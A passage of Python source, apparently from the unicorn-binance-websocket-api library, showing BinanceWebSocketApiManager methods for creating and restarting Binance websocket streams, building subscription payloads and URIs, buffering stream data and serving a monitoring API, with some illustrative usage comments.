self.restart_requests[stream_id] = {'status': "new",
'initiated': None}
# restart streams with requests
if self.restart_requests[stream_id]['status'] == "new" or \
self.stream_list[stream_id]['kill_request'] is not None:
self.kill_stream(stream_id)
if self.restart_requests[stream_id]['initiated'] is None or \
self.restart_requests[stream_id]['initiated']+5 < time.time():
self.restart_requests[stream_id]['initiated'] = time.time()
thread = threading.Thread(target=self._restart_stream_thread,
args=(stream_id,),
name=f"_restart_stream_thread: stream_id={stream_id}, "
f"time={time.time()}")
thread.start()
except KeyError:
pass
sys.exit(0)
def _restart_stream(self, stream_id):
"""
This is NOT stop/start! Its purpose is to restart a dead stream! Use `set_restart_request()` for stop/start!
:param stream_id: id of a stream
:type stream_id: str
:return: stream_id or False
"""
try:
if self.restart_requests[stream_id]['status'] != "new":
logger.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request()` "
"instead!")
return False
except KeyError:
# no restart_request entry for this stream_id:
logger.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request() instead!")
return False
logger.info("BinanceWebSocketApiManager._restart_stream(" + str(stream_id) + ", " +
str(self.stream_list[stream_id]['channels']) +
", " + str(self.stream_list[stream_id]['markets']) + f"){self.get_debug_log()}")
self.restart_requests[stream_id] = {'status': "restarted"}
self.restart_requests[stream_id]['last_restart_time'] = time.time()
self.stream_list[stream_id]['status'] = "restarting"
self.stream_list[stream_id]['kill_request'] = None
self.stream_list[stream_id]['payload'] = []
loop = asyncio.new_event_loop()
self.set_socket_is_not_ready(stream_id)
thread = threading.Thread(target=self._create_stream_thread,
args=(loop,
stream_id,
self.stream_list[stream_id]['channels'],
self.stream_list[stream_id]['markets'],
self.stream_list[stream_id]['stream_buffer_name'],
self.stream_list[stream_id]['stream_buffer_maxlen'],
True),
name=f"_create_stream_thread: stream_id={stream_id}, time={time.time()}")
thread.start()
self.stream_threads[stream_id] = thread
while self.socket_is_ready[stream_id] is False and self.high_performance is False:
# This loop will wait till the thread and the asyncio init is ready. This avoids two possible errors as
# described here: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/issues/131
logger.debug(f"BinanceWebSocketApiManager.create_stream({str(stream_id)}) - Waiting till new socket and "
f"asyncio is ready")
time.sleep(1)
return stream_id
def _restart_stream_thread(self, stream_id):
"""
Wait till the old socket has closed and then start it again
:param stream_id: id of a stream
:type stream_id: str
"""
logger.debug("BinanceWebSocketApiManager._restart_stream_thread(" + str(stream_id) + ", " +
str(self.stream_list[stream_id]['channels']) +
", " + str(self.stream_list[stream_id]['markets']) + f"){self.get_debug_log()}")
self._restart_stream(stream_id)
def _start_monitoring_api_thread(self, host, port, warn_on_update):
"""
Threaded method that serves the monitoring API
:param host: IP or hostname to use
:type host: str
:param port: Port to use
:type port: int
:param warn_on_update: Should the monitoring system report available updates?
:type warn_on_update: bool
"""
logger.info("BinanceWebSocketApiManager._start_monitoring_api_thread() - Starting monitoring API service ...")
app = Flask(__name__)
@app.route('/')
@app.route('/status/')
def redirect_to_wiki():
logger.info("BinanceWebSocketApiManager._start_monitoring_api_thread() 200 - "
"Visit https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/UNICORN-"
"Monitoring-API-Service for further information!")
return redirect("https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/"
"UNICORN-Monitoring-API-Service", code=302)
api = Api(app)
api.add_resource(BinanceWebSocketApiRestServer,
"/status/<string:statusformat>/",
"/status/<string:statusformat>/<string:checkcommandversion>",
resource_class_kwargs={'handler_binance_websocket_api_manager': self,
'warn_on_update': warn_on_update})
try:
dispatcher = wsgi.PathInfoDispatcher({'/': app})
self.monitoring_api_server = wsgi.WSGIServer((host, port), dispatcher)
self.monitoring_api_server.start()
except RuntimeError as error_msg:
logger.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
except OSError as error_msg:
logger.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
def add_to_ringbuffer_error(self, error):
"""
Add received error messages from websocket endpoints to the error ringbuffer
:param error: The data to add.
:type error: string
:return: bool
"""
while len(self.ringbuffer_error) >= self.get_ringbuffer_error_max_size():
self.ringbuffer_error.pop(0)
self.ringbuffer_error.append(str(error))
return True
def add_to_ringbuffer_result(self, result):
"""
Add received result messages from websocket endpoints to the result ringbuffer
:param result: The data to add.
:type result: string
:return: bool
"""
while len(self.ringbuffer_result) >= self.get_ringbuffer_result_max_size():
self.ringbuffer_result.pop(0)
self.ringbuffer_result.append(str(result))
return True
def add_to_stream_buffer(self, stream_data, stream_buffer_name=False):
"""
Kick back data to the
`stream_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If it is not possible to process received stream data (for example, the database is restarting, so it's not
possible to save the data), you can return the data to the stream_buffer. A few seconds after you stop
writing data back to the stream_buffer, the BinanceWebSocketApiManager starts flushing the data back to normal
processing.
:param stream_data: the data you want to write back to the buffer
:type stream_data: raw stream_data or unicorn_fied stream data
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
with self.stream_buffer_lock:
self.stream_buffer.append(stream_data)
else:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].append(stream_data)
self.last_entry_added_to_stream_buffer = time.time()
return True
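# Write-back sketch for `add_to_stream_buffer()` (illustrative; `save_to_db()` is a
# hypothetical persistence helper): if a record can not be processed, push it back into
# the stream_buffer so it is delivered again later.
#
#   data = ubwa.pop_stream_data_from_stream_buffer()
#   if data is not False:
#       try:
#           save_to_db(data)                  # hypothetical helper, not part of this module
#       except Exception:
#           ubwa.add_to_stream_buffer(data)   # return the record to the stream_buffer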
def add_to_stream_signal_buffer(self, signal_type=False, stream_id=False, data_record=False):
"""
Add signals about a stream to the
`stream_signal_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
:param signal_type: "CONNECT", "DISCONNECT" or "FIRST_RECEIVED_DATA"
:type signal_type: str
:param stream_id: id of a stream
:type stream_id: str
:param data_record: The last or first received data record
:type data_record: str or dict
:return: bool
"""
if self.enable_stream_signal_buffer:
stream_signal = {'type': signal_type,
'stream_id': stream_id,
'timestamp': time.time()}
if signal_type == "CONNECT":
# nothing to add ...
pass
elif signal_type == "DISCONNECT":
try:
stream_signal['last_received_data_record'] = self.stream_list[stream_id]['last_received_data_record']
except KeyError as error_msg:
logger.critical(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Cant determine last_received_data_record! - error_msg: {error_msg}")
stream_signal['last_received_data_record'] = None
elif signal_type == "FIRST_RECEIVED_DATA":
stream_signal['first_received_data_record'] = data_record
else:
logger.error(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Received invalid `signal_type`!")
return False
with self.stream_signal_buffer_lock:
self.stream_signal_buffer.append(stream_signal)
logger.info(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({stream_signal})")
return True
else:
return False
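# Sketch of processing stream signals with a callback instead of polling the
# `stream_signal_buffer` (signature taken from the constructor docstring above;
# illustrative only):
#
#   def handle_signal(signal_type=False, stream_id=False, data_record=False):
#       print(f"stream signal: {signal_type} for stream {stream_id}")
#
#   ubwa = BinanceWebSocketApiManager(process_stream_signals=handle_signal)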
def add_total_received_bytes(self, size):
"""
Add received bytes to the total received bytes statistic
:param size: int value of added bytes
:type size: int
"""
with self.total_received_bytes_lock:
self.total_received_bytes += int(size)
def clear_stream_buffer(self, stream_buffer_name=False):
"""
Clear the
`stream_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
try:
self.stream_buffer.clear()
return True
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].clear()
return True
except IndexError:
return False
except KeyError:
return False
def create_payload(self, stream_id, method, channels=False, markets=False):
"""
Create the payload for subscriptions
:param stream_id: provide a stream_id
:type stream_id: str
:param method: `subscribe` or `unsubscribe`
:type method: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:return: payload (list) or False
"""
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") started ...")
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
payload = []
if self.is_exchange_type("dex"):
if method == "subscribe" and channels is not False:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
symbols = []
if channel == "allMiniTickers" or \
channel == "allTickers" or \
channel == "blockheight":
add_payload["symbols"] = ["$all"]
payload.append(add_payload)
continue
if markets:
for market in markets:
if market == "allMiniTickers" or \
market == "allTickers" or \
market == "blockheight":
add_payload_from_market = {"method": method,
"topic": market,
"symbols": ["$all"]}
payload.append(add_payload_from_market)
continue
elif re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
else:
symbols.append(market)
try:
if self.stream_list[stream_id]["dex_user_address"] is not False:
add_payload["address"] = self.stream_list[stream_id]["dex_user_address"]
payload.append(add_payload)
except KeyError:
pass
if len(symbols) > 0:
add_payload["symbols"] = symbols
payload.append(add_payload)
elif method == "unsubscribe":
if markets:
add_payload = {"method": method}
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
markets.remove(market)
if len(markets) > 0:
add_payload["symbols"] = markets
payload.append(add_payload)
if channels:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
payload.append(add_payload)
else:
logger.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
elif self.is_exchange_type("cex"):
final_market = "@arr"
if markets:
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
if channels:
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
if method == "subscribe":
params = []
for channel in channels:
if "!" in channel:
params.append(channel + final_market)
continue
else:
for market in markets:
if "!" in market:
params.append(market + final_channel)
else:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
params = list(set(params))
payload = self.split_payload(params, "SUBSCRIBE")
elif method == "unsubscribe":
if markets:
params = []
try:
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel:
params.append(channel + final_market)
else:
for market in markets:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
except KeyError:
pass
if channels:
params = []
for market in self.stream_list[stream_id]['markets']:
if "!" in market:
params.append(market + final_channel)
else:
for channel in channels:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
else:
logger.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Payload: " + str(payload))
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") finished ...")
return payload
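# Illustrative call of `create_payload()` for a CEX stream. The exact result depends on
# `split_payload()` (not shown in this excerpt); the commented result shape is an
# assumption based on the Binance websocket SUBSCRIBE format:
#
#   payload = ubwa.create_payload(stream_id, "subscribe",
#                                 channels=['trade', 'kline_1m'], markets=['bnbbtc'])
#   # e.g. [{'method': 'SUBSCRIBE', 'params': ['bnbbtc@trade', 'bnbbtc@kline_1m'], 'id': 1}]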
def create_stream(self,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=None,
ping_timeout=None,
close_timeout=None,
stream_buffer_maxlen=None,
process_stream_data=None):
"""
Create a websocket stream
If you provide 2 markets and 2 channels, then you are going to create 4 subscriptions (markets * channels).
Example:
channels = ['trade', 'kline_1']
markets = ['bnbbtc', 'ethbtc']
Finally: bnbbtc@trade, ethbtc@trade, bnbbtc@kline_1, ethbtc@kline_1
`There is a subscriptions limit per stream!
<https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/Binance-websocket-endpoint-configuration-overview>`_
Create `!userData` streams as single streams, because they use a different endpoint and can not be combined
with other streams in a multiplexed stream!
Example CEX:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb")``
Isolated Margin:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb", symbols="ankrbtc")``
Example DEX:
``binance_websocket_api_manager.create_stream(['orders', 'transfers', 'accounts'], binance_dex_user_address)``
To create a multiplexed stream which includes also `!miniTicker@arr`, `!ticker@arr`, `!forceOrder@arr` or
`!bookTicker@arr` you just need to add `!bookTicker` to the channels list - don't add `arr` (cex) or `$all`
(dex) to the markets list.
Example:
``binance_websocket_api_manager.create_stream(['kline_5m', 'marketDepth', '!miniTicker'], ['bnbbtc'])``
But you have to add `arr` or `$all` if you want to start it as a single stream!
Example:
``binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])``
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label to identify the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globally overwritten with the parameter
`output_default <https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/design.html?highlight=close_timeout#closing-handshake>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:param process_stream_data: Provide a function/method to process the received webstream data (callback). The
function will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data)` where
`stream_data` contains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer or provided to the global callback function provided during
object instantiation! `How to read from stream_buffer!
<https://unicorn-binance-websocket-api.docs.lucit.tech/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
:return: stream_id or 'False'
"""
# create a stream
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`channels` must be str, tuple, list or a set!")
return False
elif isinstance(markets, bool):
logger.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`markets` must be str, tuple, list or a set!")
return False
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
output = output or self.output_default
close_timeout = close_timeout or self.close_timeout_default
ping_interval = ping_interval or self.ping_interval_default
ping_timeout = ping_timeout or self.ping_timeout_default
stream_id = self.get_new_uuid_id()
markets_new = []
if stream_buffer_name is True:
stream_buffer_name = stream_id
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
markets_new.append(str(market).upper())
else:
markets_new.append(str(market))
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
logger.info("BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets_new) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") with stream_id="
+ str(stream_id))
self._add_stream_to_stream_list(stream_id,
channels,
markets_new,
stream_label,
stream_buffer_name,
symbols=symbols,
api_key=api_key,
api_secret=api_secret,
output=output,
ping_interval=ping_interval,
ping_timeout=ping_timeout,
close_timeout=close_timeout,
stream_buffer_maxlen=stream_buffer_maxlen,
process_stream_data=process_stream_data)
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logger.critical(f"BinanceWebSocketApiManager.create_stream({str(channels)}, {str(markets_new)}, "
f"{str(stream_label)}, {str(stream_buffer_name)}, {str(symbols)}), {stream_buffer_maxlen} "
f"with stream_id={str(stream_id)} - OSError - can not create stream - "
f"error_msg: {str(error_msg)}")
return False
self.event_loops[stream_id] = loop
self.set_socket_is_not_ready(stream_id)
thread = threading.Thread(target=self._create_stream_thread,
args=(loop,
stream_id,
channels,
markets_new,
stream_buffer_name,
stream_buffer_maxlen,
False),
name=f"_create_stream_thread: stream_id={stream_id}, time={time.time()}")
thread.start()
self.stream_threads[stream_id] = thread
while self.socket_is_ready[stream_id] is False and self.high_performance is False:
# This loop will wait till the thread and the asyncio init is ready. This avoids two possible errors as
# described here: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/issues/131
logger.debug(f"BinanceWebSocketApiManager.create_stream({str(channels)}, {str(markets_new)}, "
f"{str(stream_label)}, {str(stream_buffer_name)}, {str(symbols)}, {stream_buffer_maxlen}) "
f"with stream_id={str(stream_id)} - Waiting till new socket and asyncio is ready")
time.sleep(1)
return stream_id
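# Sketch of a multiplexed stream with per-stream options (illustrative; values are
# examples). `process_stream_data` is the per-stream callback described in the docstring
# above; accepting an optional `stream_buffer_name` keeps it compatible with both call
# conventions documented in this module:
#
#   def handle_data(stream_data, stream_buffer_name=False):
#       print(stream_data)
#
#   stream_id = ubwa.create_stream(['kline_1m', 'trade'], ['bnbbtc', 'ethbtc'],
#                                  stream_label="example",
#                                  output="UnicornFy",
#                                  process_stream_data=handle_data)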
def create_websocket_uri(self, channels, markets, stream_id=False, api_key=False, api_secret=False, symbols=False):
"""
Create a websocket URI
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_id: provide a stream_id (only needed for userData streams to acquire a listenKey)
:type stream_id: str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `channels` must be str, tuple, list "
f"or a set!")
return False
elif isinstance(markets, bool):
logger.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `markets` must be str, tuple, list "
f"or a set!")
return False
payload = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if len(channels) == 1 and len(markets) == 1:
if "!userData" in channels or "!userData" in markets:
if stream_id is not False:
response = self.get_listen_key_from_restclient(stream_id, api_key, api_secret, symbols=symbols)
try:
if response['code'] == -1102 or \
response['code'] == -2008 or \
response['code'] == -2014 or \
response['code'] == -2015 or \
response['code'] == -11001:
# -1102 = Mandatory parameter 'symbol' was not sent, was empty/null, or malformed.
# -2008 = Invalid Api-Key ID
# -2014 = API-key format invalid
# -2015 = Invalid API-key, IP, or permissions for action
# -11001 = Isolated margin account does not exist.
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received known "
"error code from rest client: " + str(response))
return response
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received unknown "
"error code from rest client: " + str(response))
return response
except KeyError:
pass
except TypeError:
pass
if response:
try:
uri = self.websocket_base_uri + "ws/" + str(response['listenKey'])
uri_hidden = self.websocket_base_uri + "ws/" + self.replacement_text
if self.show_secrets_in_logs is True:
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " + uri)
else:
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " +
uri_hidden)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return uri
except KeyError:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
except TypeError:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create "
"URI!!")
return False
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create URI!!")
return False
elif "!bookTicker" in channels or "!bookTicker" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/!bookTicker"
elif "arr" in channels or "$all" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
elif "arr" in markets or "$all" in channels:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + channels[0] + "@" + markets[0]
elif self.is_exchange_type("dex"):
if re.match(r'[a-zA-Z0-9]{41,43}', markets[0]) is not None:
try:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = markets[0]
if self.stream_list[stream_id]['dex_user_address'] != markets[0]:
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: once set, the "
"dex_user_address is not allowed to get changed anymore!")
return False
except KeyError:
pass
add_payload = {"method": "subscribe",
"topic": channels[0],
"address": markets[0]}
payload.append(add_payload)
if stream_id:
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0]
elif markets[0] != "" and channels[0] != "":
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
else:
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: not able to create websocket "
"URI for DEX")
return False
if self.is_exchange_type("dex"):
query = "ws"
if stream_id:
payload = self.create_payload(stream_id, "subscribe", channels=channels, markets=markets)
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + str(query)
else:
query = "stream?streams="
final_market = "@arr"
market = ""
channel = ""
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
for channel in channels:
if channel == "!userData":
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunately Binance only stream it in a single stream socket! ./"
"Use create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
for market in markets:
if market == "!userData":
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunatly Binance only stream it in a single stream socket! ./"
"Use create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
if "!" in channel:
query += channel + final_market
elif "!" in market:
query += market + final_channel
else:
query += market.lower() + "@" + channel
try:
if self.subscribe_to_stream(stream_id, markets=markets, channels=channels) is False:
sys.exit(1)
except KeyError:
pass
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + str(symbols) + ") - Created websocket URI for stream_id=" +
str(stream_id) + " is " + self.websocket_base_uri + str(query))
return self.websocket_base_uri + str(query)
def delete_listen_key_by_stream_id(self, stream_id):
"""
Delete a Binance listen_key from a specific !userData stream
:param stream_id: id of a !userData stream
:type stream_id: str
"""
try:
if self.stream_list[stream_id]['listen_key'] is not False:
logger.info("BinanceWebSocketApiManager.delete_listen_key_by_stream_id(" + str(stream_id) + ")")
self.restclient.delete_listen_key(stream_id)
except KeyError:
return False
def delete_stream_from_stream_list(self, stream_id):
"""
Delete a stream from the stream_list
Even if a stream crashes or gets stopped, its data remains in the BinanceWebSocketApiManager until you stop the
BinanceWebSocketApiManager itself. If you want to tidy up the stream_list, you can use this method.
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
logger.info("BinanceWebSocketApiManager.delete_stream_from_stream_list(" + str(stream_id) + ")")
return self.stream_list.pop(stream_id, False)
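# Usage sketch (illustrative comment, not part of the library API) - assuming an already created
# manager instance `ubwa` and a stream that was stopped earlier:
#
#     ubwa.stop_stream(stream_id)
#     # ... later, once the stopped stream's data is no longer needed:
#     if ubwa.delete_stream_from_stream_list(stream_id):
#         print(f"removed leftover data of stream {stream_id} from the stream_list")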
def fill_up_space_left(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the left side
:param demand_of_chars: how many chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while len(blanks_pre) < demand_of_blanks:
blanks_pre += filling
blanks_post = filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_centered(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars`
:param demand_of_chars: how many chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while (len(blanks_pre)+len(blanks_post)) < demand_of_blanks:
blanks_pre += filling
if (len(blanks_pre) + len(blanks_post)) < demand_of_blanks:
blanks_post += filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_right(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the right side
:param demand_of_chars: how many chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = " "
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string))
while len(blanks_post) < demand_of_blanks-1:
blanks_pre = filling
blanks_post += filling
string = blanks_pre + str(string) + blanks_post
return string[0:demand_of_chars]
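# Illustrative sketch (comment only): the fill_up_space_*() helpers are used internally to build the
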